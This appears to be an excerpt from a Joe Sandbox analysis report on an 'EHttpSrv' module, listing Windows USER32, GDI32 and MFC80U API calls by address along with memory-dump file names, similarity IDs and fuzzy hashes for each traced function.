                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF7E
                                                                                                                • #2651.MFC80U(00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DF8A
                                                                                                                • #776.MFC80U(?,00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFA0
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFB8
                                                                                                                • #2651.MFC80U(00003025,00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFC4
                                                                                                                • #776.MFC80U(?,00003025,00003024,00003023,00000002,00000001,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFDA
                                                                                                                • #1006.MFC80U(00000000,?,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042DFF2
                                                                                                                • GetNextDlgTabItem.USER32(?,00000000,00000000), ref: 2042DFFF
                                                                                                                • #2366.MFC80U(00000000,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042E006
                                                                                                                • #2648.MFC80U(00000000,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042E015
                                                                                                                • #1005.MFC80U(00000000,00000000,00000000,00000000,00000000,?,00000000,00003025,00003024,00003023,00000002,00000001), ref: 2042E02B
                                                                                                                • GetNextDlgTabItem.USER32(?,?,00000000), ref: 2042E03A
                                                                                                                • #2366.MFC80U(00000000,?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF), ref: 2042E041
                                                                                                                • SetForegroundWindow.USER32(?), ref: 2042E054
                                                                                                                • #578.MFC80U(?,00000000,00003025,00003024,00003023,00000002,00000001,?,?,?,?,?,?,2047CCA9,000000FF,20426985), ref: 2042E066
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651#776$#6063$#1006$#2366ItemNext$#1005#2648#310#4112#4577#578ForegroundMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1760983415-0
                                                                                                                • Opcode ID: abc1e75d1e78bcdaa42f523bd2ec47a1bbf9349a3717bca76796ed268893b230
                                                                                                                • Instruction ID: 736d7076bb40e73f9e1b27985b82545e162d865dc7067139393270ec5b5eae04
                                                                                                                • Opcode Fuzzy Hash: abc1e75d1e78bcdaa42f523bd2ec47a1bbf9349a3717bca76796ed268893b230
                                                                                                                • Instruction Fuzzy Hash: 19919B71304B019FD311DBA4CC59BAEB2EAAB90B45F40C82CF2529B6E0DF78AD05CB55
                                                                                                                APIs
                                                                                                                • CopyRect.USER32(?,?), ref: 204379CC
                                                                                                                • #310.MFC80U(?,?,?,?), ref: 204379D6
                                                                                                                • SendMessageW.USER32(00000020,00001200,00000000,00000000), ref: 20437A02
                                                                                                                • #578.MFC80U ref: 20437A18
                                                                                                                • SendMessageW.USER32(00000020,00001207,-000000FF,?), ref: 20437A37
                                                                                                                • #2468.MFC80U ref: 20437A5D
                                                                                                                • SendMessageW.USER32(?,?,?,00000020), ref: 20437A84
                                                                                                                • #5398.MFC80U(000000FF,?,?,?,00000020,0000120B,?,?), ref: 20437A90
                                                                                                                • #347.MFC80U ref: 20437AE3
                                                                                                                • #1270.MFC80U(?), ref: 20437AF5
                                                                                                                • #347.MFC80U(?), ref: 20437AFE
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 20437B10
                                                                                                                • #1270.MFC80U(00000000), ref: 20437B1B
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 20437B6E
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 20437BA8
                                                                                                                • #5633.MFC80U(?,00000000,?,?,00000000), ref: 20437BE8
                                                                                                                • #5633.MFC80U(?,?,?,00000000,?,?,00000000), ref: 20437C39
                                                                                                                • BitBlt.GDI32(?,00000100,?,?,?,?,00000000,00000000,00CC0020), ref: 20437C6B
                                                                                                                • #5633.MFC80U(?,00000000), ref: 20437C7E
                                                                                                                • InflateRect.USER32(?,000000F7,000000FD), ref: 20437CB6
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 20437CC3
                                                                                                                • #2362.MFC80U(00000000), ref: 20437CCA
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20437CFC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5633$MessageSend$#1270#347ObjectRect$#2362#2468#310#5398#578CompatibleCopyCreateCurrentInflate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2914055605-0
                                                                                                                • Opcode ID: 83ae490c0e33038c8937393e5beb0e7bd944c651b64bba942306a94834426b83
                                                                                                                • Instruction ID: 45bf28f37d71678c5795a452685a6bbd76352e7e5ba656948005ded63e917d8a
                                                                                                                • Opcode Fuzzy Hash: 83ae490c0e33038c8937393e5beb0e7bd944c651b64bba942306a94834426b83
                                                                                                                • Instruction Fuzzy Hash: AAD107711087459FC324DFA4C884FABB7F8BB88714F10CA1CF595972A0DB78A905CB62
                                                                                                                APIs
                                                                                                                • #1176.MFC80U ref: 20450D82
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20450D93
                                                                                                                • #5609.MFC80U(?), ref: 20450DA1
                                                                                                                • #3395.MFC80U(?), ref: 20450DAE
                                                                                                                • #2713.MFC80U(?), ref: 20450DB9
                                                                                                                • GetParent.USER32(?), ref: 20450DC9
                                                                                                                • #2366.MFC80U(00000000), ref: 20450DD0
                                                                                                                • #2648.MFC80U(00000000), ref: 20450DDB
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20450DF1
                                                                                                                • #2362.MFC80U(00000000), ref: 20450DF8
                                                                                                                • memmove_s.MSVCR80 ref: 20450E75
                                                                                                                • #762.MFC80U(00000054,00000000), ref: 20450E91
                                                                                                                • #4109.MFC80U(00000000,?,00000020), ref: 20450EF6
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20450F0F
                                                                                                                • #4112.MFC80U(00000000,?,00000020), ref: 20450F20
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 20450F7C
                                                                                                                • SendMessageW.USER32(?,00000184,00000000,00000000), ref: 20450FD3
                                                                                                                • #6086.MFC80U(00000000), ref: 20450FF2
                                                                                                                • #2155.MFC80U(00000000,00000000), ref: 20451010
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 2045105C
                                                                                                                • SendMessageW.USER32 ref: 20451083
                                                                                                                • #6086.MFC80U(00000005), ref: 204510A8
                                                                                                                • #2155.MFC80U(00000001,00000005), ref: 204510C6
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 204510DD
                                                                                                                • #6735.MFC80U(?), ref: 2045110D
                                                                                                                • #2260.MFC80U(0000007C,00000000), ref: 20451127
                                                                                                                • #4101.MFC80U(?,00000000,00000000), ref: 20451159
                                                                                                                • SendMessageW.USER32(?,00000180,00000000), ref: 2045118F
                                                                                                                • #578.MFC80U ref: 2045119E
                                                                                                                • #578.MFC80U ref: 204511C2
                                                                                                                • #6232.MFC80U(00000000), ref: 204511F8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2155#578#6086$#1176#2260#2362#2366#2648#2713#3395#4101#4109#4112#5609#6232#6735#762ParentRectWindowmemmove_s
                                                                                                                • String ID: (
                                                                                                                • API String ID: 108199104-3887548279
                                                                                                                • Opcode ID: 060ed452582c12643f33fb5744c78ed1fb589be9d0fad5b5a129ed56d525e140
                                                                                                                • Instruction ID: aa4d5a303be5df6e6a358187d511004a39c7ace117a392d3b63d25a9527070c8
                                                                                                                • Opcode Fuzzy Hash: 060ed452582c12643f33fb5744c78ed1fb589be9d0fad5b5a129ed56d525e140
                                                                                                                • Instruction Fuzzy Hash: DCF180716042019FD714CF94C8C5FAA7BB5BF98708F04C6ACF9488B292DB78E949CB61
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 2045D71E
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 2045D723
                                                                                                                • #1555.MFC80U(00000000), ref: 2045D728
                                                                                                                • GetSysColor.USER32(00000005), ref: 2045D72F
                                                                                                                • #1079.MFC80U(?,00000000), ref: 2045D73D
                                                                                                                  • Part of subcall function 20427250: #1079.MFC80U(?,FEEA6C22), ref: 2042728B
                                                                                                                  • Part of subcall function 20427250: #6749.MFC80U(?,?,FEEA6C22), ref: 20427297
                                                                                                                • LoadIconW.USER32(00000000,00007F00), ref: 2045D756
                                                                                                                • DestroyCursor.USER32(00000000), ref: 2045D77F
                                                                                                                • #1079.MFC80U(?,000000FF,00000000), ref: 2045D76C
                                                                                                                  • Part of subcall function 204353D0: #1079.MFC80U(?,FEEA6C22), ref: 2043540B
                                                                                                                  • Part of subcall function 204353D0: #6749.MFC80U(?,?,FEEA6C22), ref: 20435417
                                                                                                                  • Part of subcall function 204353D0: #1176.MFC80U(?,?,FEEA6C22), ref: 20435444
                                                                                                                • #4574.MFC80U ref: 2045D787
                                                                                                                • #4109.MFC80U(00000000,00040000,00000000), ref: 2045D797
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 2045D7AF
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 2045D7BE
                                                                                                                • #3869.MFC80U(00000000,Column_0,00000000,00000064,000000FF), ref: 2045D7D3
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 2045D7E8
                                                                                                                • SendMessageW.USER32(?,0000104E,00000000,00000000), ref: 2045D7FA
                                                                                                                • #2366.MFC80U(00000000), ref: 2045D7FD
                                                                                                                • SendMessageW.USER32(?,00000418,00000000,000000A0), ref: 2045D816
                                                                                                                • GetClientRect.USER32(?,0000000A), ref: 2045D821
                                                                                                                • #2651.MFC80U ref: 2045D85C
                                                                                                                • #2651.MFC80U(00000001,0000000A), ref: 2045D86E
                                                                                                                • #2651.MFC80U(00000002,0000000A,00000001,0000000A), ref: 2045D880
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 2045D8A2
                                                                                                                • #2364.MFC80U(00000000), ref: 2045D8A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1079$#2651$#6749MetricsSystem$#1176#1555#2364#2366#3869#4109#4574ClientColorCursorDestroyIconLoadRect
                                                                                                                • String ID: Column_0
                                                                                                                • API String ID: 2103283411-1630879286
                                                                                                                • Opcode ID: 5d6fa8bb70667fd672e0d5e94e862f5e3e0c697cce582e92b5d20558c6df8bb8
                                                                                                                • Instruction ID: dd8e0921d3901aff80e3a421ab691459f02cf68530f25cea5a982d83c5e6769e
                                                                                                                • Opcode Fuzzy Hash: 5d6fa8bb70667fd672e0d5e94e862f5e3e0c697cce582e92b5d20558c6df8bb8
                                                                                                                • Instruction Fuzzy Hash: 8281D671780705BBE224DBA4CC86F6AB7A4BF54B08F10C61CF7596B2D1DBB8B8448791
                                                                                                                APIs
                                                                                                                • #2651.MFC80U(000004E9,00000000,?,20458068,?,00000000), ref: 204582EA
                                                                                                                • #2155.MFC80U(000004E9,00000000,?,20458068,?,00000000), ref: 204582F1
                                                                                                                • #2651.MFC80U(000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 204582FE
                                                                                                                • #2155.MFC80U(000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458305
                                                                                                                • #2651.MFC80U(000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458312
                                                                                                                • #2155.MFC80U(000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458319
                                                                                                                • #2651.MFC80U(000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458326
                                                                                                                • #2155.MFC80U(000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 2045832D
                                                                                                                • #2651.MFC80U(000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 2045833A
                                                                                                                • #2155.MFC80U(000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458341
                                                                                                                • #2651.MFC80U(000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 2045834E
                                                                                                                • #2155.MFC80U(000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068,?,00000000), ref: 20458355
                                                                                                                • #2651.MFC80U(000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068), ref: 20458362
                                                                                                                • #2155.MFC80U(000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000,?,20458068), ref: 20458369
                                                                                                                • #2651.MFC80U(000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000), ref: 20458376
                                                                                                                • #2155.MFC80U(000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000,000004E9,00000000), ref: 2045837D
                                                                                                                • #2651.MFC80U(00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000), ref: 2045838A
                                                                                                                • #2155.MFC80U(00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000,000004EA,00000000), ref: 20458391
                                                                                                                • #2651.MFC80U(00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000), ref: 2045839E
                                                                                                                • #2155.MFC80U(00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000,000004EB,00000000), ref: 204583A5
                                                                                                                • #2651.MFC80U(00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000), ref: 204583B2
                                                                                                                • #2155.MFC80U(00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000,000004F0,00000000), ref: 204583B9
                                                                                                                • #2651.MFC80U(00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000), ref: 204583C6
                                                                                                                • #2155.MFC80U(00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000,000003EE,00000000), ref: 204583CD
                                                                                                                • #2651.MFC80U(000004EF,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000), ref: 204583DA
                                                                                                                • #2155.MFC80U(000004EF,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA,00000000), ref: 204583E1
                                                                                                                • #2651.MFC80U(00000481,000004EF,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB), ref: 2045840D
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 20458425
                                                                                                                • #2651.MFC80U(00000480,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA), ref: 20458432
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 20458444
                                                                                                                • #2651.MFC80U(00000485,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB,00000000,000004DA), ref: 20458451
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 20458463
                                                                                                                • #2651.MFC80U(00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB), ref: 20458474
                                                                                                                • #2155.MFC80U(00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8,00000000,000004DB), ref: 2045847B
                                                                                                                • #2651.MFC80U(00000502,00000000,00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8), ref: 20458488
                                                                                                                • #2155.MFC80U(00000502,00000000,00000503,00000000,?,?,00000000,00000414,00000000,00000485,00000000,00000481,00000000,00000480,00000000,000004E8), ref: 2045848F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651$#2155$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2554225707-0
                                                                                                                • Opcode ID: 2a91c41e58a9239e0cf9fb06e0310c7268f69ef36e89a5c0e7b838b5ee56a8b0
                                                                                                                • Instruction ID: 77c20bd14644053fe35fb93ba4e152a15ee534d5efd993665a1fbf02ccc77aa3
                                                                                                                • Opcode Fuzzy Hash: 2a91c41e58a9239e0cf9fb06e0310c7268f69ef36e89a5c0e7b838b5ee56a8b0
                                                                                                                • Instruction Fuzzy Hash: 2B41EDB07C06516AD91963F14C67FBF156ADBE2E08F80C52CB2426FAE0DDAC9D038759
                                                                                                                APIs
                                                                                                                • #347.MFC80U(FEEA6C22), ref: 20422439
                                                                                                                • #1270.MFC80U(?), ref: 20422451
                                                                                                                • #5584.MFC80U(?), ref: 2042245A
                                                                                                                • CopyRect.USER32(?,?), ref: 2042246C
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 2042249F
                                                                                                                • #1271.MFC80U(00000000), ref: 204224AA
                                                                                                                • #5635.MFC80U(20488C48,00000000), ref: 204224B8
                                                                                                                • #1925.MFC80U(20488C48,00000000), ref: 204224C1
                                                                                                                • GetSysColor.USER32(0000000F), ref: 204224C8
                                                                                                                • #326.MFC80U(00000000), ref: 204224D3
                                                                                                                • FillRect.USER32(?,?,?), ref: 204224EF
                                                                                                                • SendMessageW.USER32(?,0000120B,?,?), ref: 2042252B
                                                                                                                • CopyRect.USER32(?,?), ref: 20422577
                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,00008924), ref: 204225D8
                                                                                                                • GetSysColor.USER32(00000014), ref: 204225FC
                                                                                                                • #502.MFC80U(00000000,00000001,00000000), ref: 20422607
                                                                                                                • GetSysColor.USER32(00000010), ref: 20422616
                                                                                                                • #502.MFC80U(00000000,00000001,00000000), ref: 20422621
                                                                                                                • #5638.MFC80U(?,00000000,00000001,00000000), ref: 20422637
                                                                                                                • #4117.MFC80U(?,?,?,?,00000000,00000001,00000000), ref: 2042265E
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?,00000000,00000001,00000000), ref: 20422678
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 20422698
                                                                                                                • #5638.MFC80U(?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 204226A6
                                                                                                                • #4117.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 204226C8
                                                                                                                • #3995.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 20422765
                                                                                                                • #5638.MFC80U(00008924,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20422773
                                                                                                                • #5519.MFC80U(?), ref: 204227A3
                                                                                                                • #1957.MFC80U(?), ref: 204227AC
                                                                                                                  • Part of subcall function 20414A70: #1925.MFC80U(FEEA6C22,?,?,?,00000000,2047B9E9,000000FF), ref: 20414AB9
                                                                                                                • #602.MFC80U(?), ref: 20422802
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#3995#5638Color$#1925#4117#502Copy$#1270#1271#1957#326#347#5519#5584#5635#602CreateDrawFillIndirectMessageSendText
                                                                                                                • String ID:
                                                                                                                • API String ID: 1715972708-0
                                                                                                                • Opcode ID: 9fca55ed4a40095a3227d01100ba49ce01f027b267da5f4119c3224918b91aad
                                                                                                                • Instruction ID: d666b1c84b9d6d69ff095b1d7bad3806f02d2e1acc2ac58b3e1f69ded9572eef
                                                                                                                • Opcode Fuzzy Hash: 9fca55ed4a40095a3227d01100ba49ce01f027b267da5f4119c3224918b91aad
                                                                                                                • Instruction Fuzzy Hash: 7FC14D71108381AFC354CF64C995BABBBF4FF94704F408A1CF195872A4DB38A949CB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2461$#5149#5398#776$#310NamePathShort$#578#774#896EnvironmentExpandStrings_wcsicmpwcsncmp
                                                                                                                • String ID: \\?\$system
                                                                                                                • API String ID: 34813449-175627492
                                                                                                                • Opcode ID: c8e0f6914f928cd7582feb275fcfeaa506cf759af608ad1b60c1f88940210c27
                                                                                                                • Instruction ID: 742173bcf6f87cae9c2c156507115ba212f5655925c953d735356dab2d6ead28
                                                                                                                • Opcode Fuzzy Hash: c8e0f6914f928cd7582feb275fcfeaa506cf759af608ad1b60c1f88940210c27
                                                                                                                • Instruction Fuzzy Hash: 3051C6B15087019FC700EF64CCC9A9EB7E4EB84719F40893DF992932A1EE785949CB91
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 20413232
                                                                                                                • #6086.MFC80U(00000000,FEEA6C22), ref: 20413240
                                                                                                                • #6086.MFC80U(00000000,00000000,FEEA6C22), ref: 2041324C
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20413263
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20413271
                                                                                                                • #5609.MFC80U(?), ref: 2041327A
                                                                                                                • #5609.MFC80U(?,?), ref: 20413286
                                                                                                                • #762.MFC80U(000000DC,?,?), ref: 20413290
                                                                                                                • #1562.MFC80U(50804005,?,?,00000004), ref: 204132D0
                                                                                                                • #762.MFC80U(000000DC,50804005,?,?,00000004), ref: 204132DA
                                                                                                                • #1562.MFC80U(50804005,?,?,00000004), ref: 2041331B
                                                                                                                • memset.MSVCR80 ref: 2041338D
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 204133A9
                                                                                                                • #2362.MFC80U(00000000,?,?,?,00000004), ref: 204133AC
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 204133BC
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 204133CD
                                                                                                                • #1271.MFC80U(00000000,?,?,?,00000004), ref: 204133D6
